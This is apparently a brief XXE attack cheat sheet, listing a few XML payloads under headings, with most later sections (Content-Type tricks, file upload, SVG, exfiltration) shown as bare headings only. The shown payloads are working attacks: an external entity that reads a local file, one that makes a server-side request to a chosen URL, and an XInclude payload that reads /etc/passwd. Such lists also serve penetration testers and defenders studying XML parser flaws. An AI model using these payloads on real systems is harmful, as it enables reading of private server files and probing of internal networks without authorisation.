XXE
Exploits
File Retrieval
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://<path>"> ]>
<field>&xxe;</field>SSRF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://<url>/"> ]>
<field>&xxe;</field>XInclude Attack
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>XXE Through Modified Content-Type
POST Request
JSON Body
XXE Through file upload
XSLT
SVG
Parametric payloads
SSRF
File exfiltration
Error based file exfiltration
Error based with DTD override
Last updated